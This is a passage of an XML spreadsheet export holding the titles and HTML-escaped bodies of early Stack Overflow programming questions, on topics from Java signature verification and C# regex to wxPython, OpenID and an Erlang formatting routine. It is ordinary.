    <t xml:space="preserve">&lt;p&gt;I have to verify the signature on a file that may be as large as 2Gb, and I want to do so in a way that is as memory-efficient as possible.  For various reasons, the file will already be loaded completely into memory, and is accessed using an &lt;code&gt;InputStream&lt;/code&gt; by the application.  I would like to verify the signature using the stream interface, but the JCA &lt;code&gt;Signature&lt;/code&gt; class' &lt;code&gt;update&lt;/code&gt; method only accepts &lt;code&gt;byte[]&lt;/code&gt; and related classes.&lt;/p&gt;
&lt;p&gt;How can I do this efficiently?  I don't want to load the beast into a second byte array, otherwise we'll be seeing some seriously high memory use, but the interface doesn't seem to support it otherwise.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;If it matters, the signing algorithm is SHA-1&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a foreach in MATLAB? If so, how does it behave if the underlying data changes?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a foreach structure in MATLAB?  If so, what happens if the underlying data changes (i.e. if objects are added to the set)?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I check out an SVN project into Eclipse as a Java project?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I was trying to check out a project from SVN using Eclipse. I tried using "Checkout As" to make it into a "Java project from existing Ant script", but the project wizard requires the file to have already been downloaded. Is there a way to checkout the project into Eclipse as a Java project, without having to download it elsewhere first?&lt;/p&gt;
&lt;p&gt;(I am using Eclipse Ganymade 3.4.1 with Subversive.)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL 2005 Query Help</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have table with 50 entries (users with such details like Name Surname Location etc)&lt;/p&gt;
&lt;p&gt;I want to create a query that give me users from row 1 to row 10. Then another query that give me users from 11 to 20 and so on.&lt;/p&gt;
&lt;p&gt;Is there any way how to do that?&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Returning from inside the scope of a 'using' statement?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've got some code that looks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;using (DBDataContext dc = new DBDataContext(ConnectionString))
{
    Main main = new Main
    {
    	ClientTime = clientTime
    };
    dc.Mains.InsertOnSubmit(main);
    dc.SubmitChanges();
    return main.ID;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If I return from inside a "using", will the using still clean up?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How Can I Get the Index of An Item in a ListBox?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am adding items to a &lt;code&gt;ListBox&lt;/code&gt; like so:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;myListBox.Items.addRange(myObjectArray);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and I also want to select some of the items I add by the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;foreach(MyObject m in otherListOfMyObjects) 
{
    int index = myListBox.Items.IndexOf(m);
    myListBox.SelectedIndices.Add(index);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;however &lt;code&gt;index&lt;/code&gt; is always &lt;code&gt;-1&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Is there a different way to get the index of an object in a &lt;code&gt;ListBox&lt;/code&gt;?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Microsoft Exception Handling Block - Isn't it a perfect example for overengineering?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Ever since Microsoft has introduced the application blocks, I've been bumping into people who use the &lt;a href="http://msdn.microsoft.com/en-us/library/dd203116.aspx"&gt;Exception Handling Application Block&lt;/a&gt;. I've recently had a closer look myself and would summarize the basic functionality as follows (skip the following block if you already know what it does):&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;The exception handling application block aims to centralize and make fully configurable with config files the following &lt;a href="http://msdn.microsoft.com/en-us/library/dd203198.aspx"&gt;key exception handling tasks&lt;/a&gt;:&lt;/p&gt;
  &lt;ul&gt;
  &lt;li&gt;Logging an Exception&lt;/li&gt;
  &lt;li&gt;Replacing an Exception&lt;/li&gt;
  &lt;li&gt;Wrapping an Exception&lt;/li&gt;
  &lt;li&gt;Propagating an Exception&lt;/li&gt;
  &lt;li&gt;etc.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p&gt;The library does that by having you modify your try catch blocks as follows:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;try
{
  // Run code.
}
catch(DataAccessException ex)
{
    bool rethrow = ExceptionPolicy.HandleException(ex, "Data Access Policy");
    if (rethrow)
    {
        throw;
    }
}
&lt;/code&gt;&lt;/pre&gt;
  &lt;p&gt;Based on what is specified in the app.config for the policy name (&lt;a href="http://msdn.microsoft.com/en-us/library/dd139868.aspx"&gt;see here for docs&lt;/a&gt;), HandleException will either ...&lt;/p&gt;
  &lt;ul&gt;
  &lt;li&gt;throw a completely new exception (replace the original exception)&lt;/li&gt;
  &lt;li&gt;wrap the original exception in a new one and throw that&lt;/li&gt;
  &lt;li&gt;swallow the exception (i.e. do nothing)&lt;/li&gt;
  &lt;li&gt;have you rethrow the original exception&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p&gt;Additionally you can also configure it to do more stuff beforehand (e.g. log the exception).&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Now here's my problem: I completely fail to see how it can be beneficial to make it configurable whether an exception is replaced, wrapped, swallowed or rethrown. In my experience, this decision must be made at the time you write the code because you'll typically have to change the surrounding or calling code when you change the exception handling behavior.&lt;/p&gt;
&lt;p&gt;For example, your code will likely start to behave incorrectly when you reconfigure such that a particular exception thrown at a particular point is now swallowed instead of rethrown (there might be code after the catch block that must not be executed when the exception occurs). The same goes for all other possible changes in exception handling (e.g. replace -&gt; rethrow, swallow -&gt; wrap).&lt;/p&gt;
&lt;p&gt;So, to me the bottom line is that the exception handling block solves problems that really don't exist in practice. The exception logging and notifying bit is fine, but isn't all the other stuff just a perfect example for overengineering?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C#: Refactoring a Reynolds number calculator</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to learn some C# over the weekend and am following the 15 exercises found here: &lt;a href="http://www.jobsnake.com/seek/articles/index.cgi?openarticle&amp;amp;8533" rel="nofollow"&gt;http://www.jobsnake.com/seek/articles/index.cgi?openarticle&amp;amp;8533&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Yesterday I asked a similar question for the Fibonacci sequence and received some great responses which introduced me to elements of C# which I'd not encountered before: 
&lt;a href="http://stackoverflow.com/questions/406446/refactoring-fibonacci-algorithm"&gt;http://stackoverflow.com/questions/406446/refactoring-fibonacci-algorithm&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Today I would like to see how a C# Jedi would refactor the following code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;static string Reynolds(int d, int v, int rho, int mu)
{
	int number = (d*v*rho) / mu;
	if (number &amp;lt; 2100) return "Laminar Flow";
	else if (number &amp;lt; 2100 &amp;amp;&amp;amp; number &amp;lt; 4000) return "Transient Flow";
	else return "Turbulent Flow";
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So more simple than yesterday, but is there any nice way to deal with the multiple conditionals?&lt;/p&gt;
&lt;p&gt;Regards,&lt;/p&gt;
&lt;p&gt;Chris&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Regular expression to parse an array of JSON objects?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to parse an array of JSON objects into an array of strings in C#. I can extract the array from the JSON object, but I can't split the array string into an array of individual objects.&lt;/p&gt;
&lt;p&gt;What I have is this test string:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;string json = "{items:[{id:0,name:\"Lorem Ipsum\"},{id:1,name" 
            + ":\"Lorem Ipsum\"},{id:2,name:\"Lorem Ipsum\"}]}";
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Right now I'm using the following regular expressions right now to split the items into individual objects. For now they're 2 separate regular expressions until I fix the problem with the second one:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Regex arrayFinder = new Regex(@"\{items:\[(?&amp;lt;items&amp;gt;[^\]]*)\]\}"
                                 , RegexOptions.ExplicitCapture);
Regex arrayParser = new Regex(@"((?&amp;lt;items&amp;gt;\{[^\}]\}),?)+"
                                 , RegexOptions.ExplicitCapture);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The &lt;code&gt;arrayFinder&lt;/code&gt; regex works the way I'd expect it but, for reasons I don't understand, the &lt;code&gt;arrayParser&lt;/code&gt; regex doesn't work at all. All I want it to do is split the individual items into their own strings so I get a list like this:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;&lt;code&gt;{id:0,name:"Lorem Ipsum"}&lt;/code&gt;&lt;br /&gt;
  &lt;code&gt;{id:1,name:"Lorem Ipsum"}&lt;/code&gt;&lt;br /&gt;
  &lt;code&gt;{id:2,name:"Lorem Ipsum"}&lt;/code&gt;  &lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Whether this list is a &lt;code&gt;string[]&lt;/code&gt; array or a &lt;code&gt;Group&lt;/code&gt; or &lt;code&gt;Match&lt;/code&gt; collection doesn't matter, but I'm stumped as to how to get the objects split. Using the &lt;code&gt;arrayParser&lt;/code&gt; and the &lt;code&gt;json&lt;/code&gt; string declared above, I've tried this code which I assumed would work with no luck:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;string json = "{items:[{id:0,name:\"Lorem Ipsum\"},{id:1,name" 
            + ":\"Lorem Ipsum\"},{id:2,name:\"Lorem Ipsum\"}]}";
Regex arrayFinder = new Regex(@"\{items:\[(?&amp;lt;items&amp;gt;[^\]]*)\]\}"
                                 , RegexOptions.ExplicitCapture);
Regex arrayParser = new Regex(@"((?&amp;lt;items&amp;gt;\{[^\}]\}),?)+"
                                 , RegexOptions.ExplicitCapture);
string array = arrayFinder.Match(json).Groups["items"].Value;
// At this point the 'array' variable contains: 
// {id:0,name:"Lorem Ipsum"},{id:1,name:"Lorem Ipsum"},{id:2,name:"Lorem Ipsum"}
// I would have expected one of these 2 lines to return 
// the array of matches I'm looking for
CaptureCollection c = arrayParser.Match(array).Captures;
GroupCollection g = arrayParser.Match(array).Groups;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Can anybody see what it is I'm doing wrong? I'm totally stuck on this.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Stack, Static, and Heap in C++</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've searched, but I've not understood very well these three concepts. When do I have to use dynamic allocation (in the heap) and what's its real advantage? What are the problems of static and stack? Could I write an entire application without allocating variables in the heap?   &lt;/p&gt;
&lt;p&gt;I heard that others languages incorporate a "garbage collector" so you don't have to worry about memory. What does the garbage collector do?  &lt;/p&gt;
&lt;p&gt;What could you do manipulating the memory by yourself that you couldn't do using this garbage collector?&lt;/p&gt;
&lt;p&gt;Once someone said to me that with this declaration:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;int * asafe=new int;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I have a "pointer to a pointer". What does it mean? It is different of:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;asafe=new int;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Catch MainLoop exceptions and displaying them in MessageDialogs</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a wxPython application that relies on an external config file.  I want provide friendly message dialogs that show up if there are any config errors.  I've tried to make this work by wrapping my app.MainLoop() call in a try/except statement.&lt;/p&gt;
&lt;p&gt;The code below works for the init code in my MainWindow frame class, but doesn't catch any exceptions that occur within the MainLoop.  How can I catch these exceptions as well?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if __name__ == '__main__':
    app = MyApp(0)
    try:
        MainWindow(None, -1, 'My Cool App')
        app.MainLoop()
    except ConfigParser.Error, error_message:
        messagebox = wx.MessageDialog(None, error_message, 'Configuration Error', wx.OK | wx.ICON_ERROR)
        messagebox.ShowModal()
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I've read some mention of an OnExceptionInMainLoop method that can be overridden in the wx.App class, but the source I read must be out of date (2004) since wx.App no longer seems to have a method by that name.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I need to be able to catch unhandled exceptions during my mainloop so that I can further handle them and display them in error dialogs, not pass silently, and not terminate the app.&lt;/p&gt;
&lt;p&gt;The sys.excepthook solution is too low level and doesn't play nice with the wxPython mainloop thread.  While the link to the other answer does the same try/except wrapping around the mainloop which doesn't work due, once again, to wxPython spawning a different thread for the app/ui.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the difference between Swing and AWT?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can someone please explain me what's the difference between Swing and AWT?&lt;/p&gt;
&lt;p&gt;Are there any cases where AWT is more useful/advised to use than swing or vice-versa?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Mass Memory Default directory</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;in my application i want to support both mass memory and memory card. but is the defualt drive name for mass memory "F:" ?&lt;/p&gt;
&lt;p&gt;or it might change . and how could i know if it changes ?!?&lt;/p&gt;
&lt;p&gt;Note : Lang is C# , windows application , Mobile series :S60&lt;/p&gt;
&lt;p&gt;thnx&lt;/p&gt;
</t>
  </si>
  <si>
    <t>IOCP, Cross platform libraries?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've recently bumped into something called IOCP on the windows platform, to be more precise: Input/Output Control Ports. This seems to be &lt;i&gt;the&lt;/i&gt; most efficient way to code your server software when it needs to hold thousands of users concurrently.
(Correct me if I'm wrong, but thread-per-socket, polling, and asynchronous callbacks (thread on every callback) are not efficient enough.)&lt;/p&gt;
&lt;p&gt;I am wondering if there are any 3rd party libraries available that implement this concept. I know the win32 api supplies us with CreateIoCompletionPort, FreeBSD has kqueue and linux in general can use /dev/epoll that works somewhat similarly... But isn't there a crossplatform library (such as boost::thread) that handles this stuff for me?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Generating WordML Reports Using Templates and XPath using ASP.Net</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to know how we can Generate WordML Reports Using Templates and XPath using ASP.Net.
What are its advantages.&lt;/p&gt;
&lt;p&gt;A Simple How To Tutorial is what I require.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to structure a Java EE system? How is the term application and thus the content of an EAR defined?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am in the process of designing a build system and the directory structure for a large software system developed with Java EE 5. The build system will be implemented using ant.&lt;/p&gt;
&lt;p&gt;We have multiple different services, which are grouped thematically. Each service offers either a web service or EJBs. Each service runs on a dedicated application server cluster. Thus, we have multiple clusters and some of these clusters can be grouped logically by topics.&lt;/p&gt;
&lt;p&gt;I did read generic definitions and examples, but I am still confused about the Java EE terminology:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;What is a Java EE application? And thus, what is the content of an EAR file?&lt;/li&gt;
&lt;li&gt;What is a Java EE Project? (the term is used by Netbeans as well as in the Java Blueprints Guidelines Project Conventions for Enterprise Applications)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Do I have to put all EJB and WAR-module-package-files into one single EAR, so that this single EAR contains our complete system?&lt;/p&gt;
&lt;p&gt;Or do I put each group of services into one EAR, despite the fact that these services are only grouped logically but not technically?&lt;/p&gt;
&lt;p&gt;Or do I assemble a separate EAR for each service, i.e. most often only containing a single EJB jar file and sometimes and EJB and a WAR file?&lt;/p&gt;
&lt;p&gt;Or do I dismiss the concept of applications and merely build EJB and WAR files, so that I have exactly one deployment file for each application server cluster?&lt;/p&gt;
&lt;p&gt;I guess, my main question is: What are the advantages of packaging EAR files?&lt;/p&gt;
&lt;p&gt;As I see it at the moment, there is only the need for EAR-EJB and WAR files and additionally the concept of nested subproject in the ant-build-system and the directory structure of our source?&lt;/p&gt;
&lt;p&gt;Edit: Thanks a lot for the answers! It seems to me that an application packaged into an ear is a rather atomic subsystem. So I guess, that I will have a nested subproject-structure (only logical, visible only to the build system and in the directory structure of the source) and a rather large amount of EARs, each of those containing mostly only one ejb-jar and/or war module and implementing a single service (which is deployed on a single application server cluster).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Remove whitespace before a field using AWK</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;(&lt;em&gt;Almost exact duplicate of &lt;a href="http://stackoverflow.com/questions/408469/keeping-original-format-post-passing-through-awk"&gt;http://stackoverflow.com/questions/408469/keeping-original-format-post-passing-through-awk&lt;/a&gt; submitted by same person.&lt;/em&gt;)&lt;/p&gt;
&lt;p&gt;I have a simple question pertaining to &lt;b&gt;g&lt;/b&gt;awk, illustrated below:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;  1 int blah (void)
  2 {
  3         if (foo) {
  4                 printf ("blah\n");
  5         }       
  6         return 0;
  7 }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Using the following gawk code - using gensub() to maintain original formatting:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt; gawk '{ print gensub($1, "\t", 1) }' ./sample_code.out
     int blah (void)
     {
             if (foo) {
                     printf ("blah\n");
             }       
             return 0;
     }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How can I use &lt;b&gt;g&lt;/b&gt;awk or awk (maybe with regular expressions) to remove previous whitespace before field $1 &lt;b&gt;(^ )&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;Illustrated below:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt; int blah (void)
 {
         if (foo) {
                 printf ("blah\n");
         }       
         return 0;
 }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Kind regards in advance&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Accessing a Class that is NOT declared in App_Code in ASP.NET</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I sometimes define Business Logic classes to "help" my ASPX code-behind classes.  It makes the most sense to me to include them both in the code-behind file since they work together.  However, I'd occasionally like to access the Business Logic classes from higher level classes defined in App_Code but they aren't automatically accessible outside of the file.&lt;/p&gt;
&lt;p&gt;Thus, the question: it is easy to access classes defined in App_Code but how do I access classes defined elsewhere?&lt;/p&gt;
&lt;p&gt;UPDATE: One other thing, the ASPX page class and the App_Code class are in the same namespace - that isn't the issue.&lt;/p&gt;
&lt;p&gt;NOTE: I have taken the advice of those who have responded (thanks guys) and am refactoring to make class access easier.  However, I don't think the question is actually answered yet (in the case of an ASP.NET Website project).  I don't &lt;em&gt;need&lt;/em&gt; the answer any more but, if someone could clarify what makes classes visible when they are outside of App_Code, it may well help someone else (or even me, down the road).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Which license can I release stand-alone (exe, dmg) shoes-applications under?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If I create an application, using &lt;a href="http://shoooes.net/" rel="nofollow"&gt;Shoes&lt;/a&gt;, would I have to license it under a open source license, or can I use it for closed-source/propietary stuff? The framework consists of a lot of moving parts, so it's not entirely clear to me.&lt;/p&gt;
&lt;p&gt;EDIT: The reason why I'm asking, is because of the notes &lt;a href="http://hackety.org/2008/06/19/stampingExesAndDmgs.html" rel="nofollow"&gt;at this page&lt;/a&gt;:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Since both anal_pe and XPwn are GPL, Iâ€™m afraid this extension must be GPL as well. The rest of Shoes is MIT. Which is okay I guess since the packager isnâ€™t really needed to run Shoes apps.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I assume that it doesn't affect the final product that the packager is GPL'ed, but I just wanted an opinion about that, other than my own guesswork.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What do you write in your log book?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Everywhere I've worked, programmers carry about a ruled A4 hard-back note book.  To avoid attracting attention, I dutifully carry one also, and once or twice in every meeting I nod sagely and pretend to write down something interesting.  Occasionally people leave theirs unattended and I sneak a look.  Mostly they seem to be writing a complete narrative of everything they do in the order it happened.  Some fill book after book with tiny scrawl like the Kevin Spacey character in 'Seven'.&lt;/p&gt;
&lt;p&gt;I can't seem to organize these books like everyone else.  Almost all of the paper I generate I throw away, so I work with loose sheets.  The things which need preserving end up in design docs or a wiki.  TODOs are best tracked as Post-Its on my monitor.  Browser bookmarks take care of most day-to-day info about 3rd party tools, and so on. &lt;/p&gt;
&lt;p&gt;Could anyone who has an effective log book system please share?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Anybody using .netTiers?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm considering adopting .nettiers for a new project as it seems to provide a lot of functionality I could use.&lt;/p&gt;
&lt;p&gt;Is anybody using it in anger (I'm getting the feeling it hasn't got the following it once had) and if so, what are your perceptions of it?&lt;/p&gt;
&lt;p&gt;Also, I can't find any comparative performance metrics against things like SubSonic. Anybody have any strong feelings about its performance and scalability?&lt;/p&gt;
&lt;p&gt;Many thanks&lt;/p&gt;
&lt;p&gt;Tony&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to vectorize with gcc?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The v4 series of the &lt;code&gt;gcc&lt;/code&gt; compiler can automatically vectorize loops using the &lt;a href="http://en.wikipedia.org/wiki/SIMD" rel="nofollow"&gt;SIMD&lt;/a&gt; processor on some modern CPUs, such as the AMD Athlon or Intel Pentium/Core chips. How is this done?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Sorting and Grouping Nested Lists in Python</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have the following data structure (a list of lists)&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[
 ['4', '21', '1', '14', '2008-10-24 15:42:58'], 
 ['3', '22', '4', '2somename', '2008-10-24 15:22:03'], 
 ['5', '21', '3', '19', '2008-10-24 15:45:45'], 
 ['6', '21', '1', '1somename', '2008-10-24 15:45:49'], 
 ['7', '22', '3', '2somename', '2008-10-24 15:45:51']
]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I would like to be able to&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;Use a function to reorder the list so that I can group by each item in the list. For example I'd like to be able to group by the second column (so that all the 21's are together) &lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Use a function to only display certain values from each inner list. For example i'd like to reduce this list to only contain the 4th field value of '2somename' &lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;so the list would look like this &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[
     ['3', '22', '4', '2somename', '2008-10-24 15:22:03'], 
     ['7', '22', '3', '2somename', '2008-10-24 15:45:51']
]
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Running an OpenID organization</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I wrote an application recently, which relies on OpenID for authentication. A lot of web applications these days are moving to OpenID, insofar that they &lt;em&gt;already&lt;/em&gt; have userid/password authentication scheme, and OpenID is just an add-on. Since my application is a new one, I decided that it makes no sense to program separate authentication mechanism based on userid/password, when I can rely on OpenID for all the authentication altogether.&lt;/p&gt;
&lt;p&gt;But sure as hell, once I presented the application to a customer, she asked "well, how do we create user accounts, and reset their passwords"? Conceptually, she didn't want to make the users create their own OpenID if they don't already have one.&lt;/p&gt;
&lt;p&gt;I kind-of had a pre-made response to that, which was: "You can always run your own OpenID server". I guess I didn't put too much thought into this answer though, since many implementations of OpenID server are pretty raw and need a lot of work before they could be run in production.&lt;/p&gt;
&lt;p&gt;So, my question is: does anyone here have an experience of running private OpenID server purely for authenticating of her own users. Here are the features I'm looking for it to support out of the box:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Ability to bulk-load user accounts&lt;/li&gt;
&lt;li&gt;Self-served password resets through verification email&lt;/li&gt;
&lt;li&gt;Administrative features (lock/unlock/disable accounts, troubleshoot, etc)&lt;/li&gt;
&lt;li&gt;Presentable look&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>Auto-vectorizing vs. vectorized code by hand</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it better in some sense to vectorize code by hand, using explicit pragmas or to rely on or use auto-vectorization?  For optimum performance using auto-vectorization, one would have to monitor the compiler output to ensure that loops are being vectorized or modify them until they are vectorizable.  &lt;/p&gt;
&lt;p&gt;With hand coding, one is certain that the desired instructions are being emitted, but now the code is likely not portable (either to other architectures or other compilers).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Protecting your images, CSS and Javascript files from being used by external sites with Apache?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I came across a site that demonstrated a Javascript library and it asked that you please not link to the Javascript file directly from your site.  That's a reasonable request.  In fact, it wouldn't have occurred to me to do that instead of hosting it myself but I guess will try and save on bandwidth any way they can.&lt;/p&gt;
&lt;p&gt;This got me thinking: does Apache (in a shared hosting environment) come with any simple means of either preventing this or at least making it a little more difficult by looking at the HTTP_REFERRER or the likes?  Or perhaps even just ensuring you have a PHP session?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can you lock on a generic dictionary?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Or should you always create some other lock object?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is Java written in?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What language is Sun's &lt;code&gt;JVM&lt;/code&gt; written in?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>mySQL stored procedure with .NET connector problem</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've seen other topics that deal with this error but none that seem to correspond to my situation.&lt;/p&gt;
&lt;p&gt;First of all, my code works completely fine when i run it locally.&lt;/p&gt;
&lt;p&gt;But when i upload it to the server, i get the error:&lt;/p&gt;
&lt;p&gt;Parameter '?PuserName' not found in the collection.&lt;/p&gt;
&lt;p&gt;Here is the C# code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public DataSet GetEmployeeByUsername(string username)
        {
            string proc = "schema.GetEmployeeByUsername";
            MySqlParameter[] args = new MySqlParameter[1];
            args[0] = new MySqlParameter("?PuserName", MySqlDbType.VarChar);
            args[0].Value = username;
            return SQLDatasetCall(args, proc);
        }
 protected DataSet SQLDatasetCall(MySqlParameter[] sqlparams, string call)
        {
            string myConString = ConfigurationManager.AppSettings["mySql"];
            MySqlConnection MyConnection = new MySqlConnection(myConString);
            MySqlDataAdapter adapter = new MySqlDataAdapter();
            MyConnection.Open();
            MySqlCommand command = new MySqlCommand(call, MyConnection);
            command.CommandType = CommandType.StoredProcedure;
            if (sqlparams != null)
            {
                foreach (MySqlParameter param in sqlparams)
                {
                    command.Parameters.Add(param);
                }
            }
            DataSet ds = new DataSet();
            adapter.SelectCommand = command;
            adapter.Fill(ds);
            adapter.Dispose();
            MyConnection.Close();
            return ds;
        }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;SQL code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;delimiter |
create procedure GetEmployeeByUsername(in PuserName varchar(45))
begin
  select id,
      firstName,
      lastName,
      phone,
      address1,
      address2,
      city,
      state,
      zip,
      username,
      password,
      emptypeid
  from schema.tblemployees
  where
      username=PuserName;
end |
delimiter;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Printing named parameters</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Archaelus suggested in &lt;a href="http://stackoverflow.com/questions/383407/what-are-some-interesting-projects-to-solve-in-erlang-for-learning-purposes#383456"&gt;this post&lt;/a&gt; that writing a new format routine to handle named parameters may be a good learning exercise. So, in the spirit of learning the language I wrote a formatting routine which handles named parameters.&lt;/p&gt;
&lt;p&gt;&lt;br /&gt;&lt;br /&gt;
&lt;strong&gt;An Example:&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;1&amp;gt; fout:format("hello ~s{name}, ~p{one}, ~p{two}, ~p{three}~n",[{one,1},{three,3},{name,"Mike"},{two,2}]).
hello Mike, 1, 2, 3
ok
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The Benchmark:&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;1&amp;gt; timer:tc(fout,benchmark_format_overhead,["hello ~s{name}, ~p{one}, ~p{two}, ~p{three}~n",[{one,1},{name,"Mike"},{three,3},{two,2}],100000]).
{421000,true}
= 4.21us per call
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Although I suspect that much of this overhead is due to looping, as a calling the function with one loop yields a response in &amp;lt; 1us.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;1&amp;gt; timer:tc(fout,benchmark_format_overhead,["hello ~s{name}, ~p{one}, ~p{two}, ~p{three}~n",[{one,1},{name,"Mike"},{three,3},{two,2}],1]).
{1,true}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If there is a better way of benchmarking in erlang, please let me know.&lt;/p&gt;
&lt;p&gt;&lt;br /&gt;&lt;br /&gt;
&lt;strong&gt;The Code:&lt;/strong&gt;
(which has been revised in accordance with Doug's suggestion)&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;-module(fout).
-export([format/2,benchmark_format_overhead/3]).
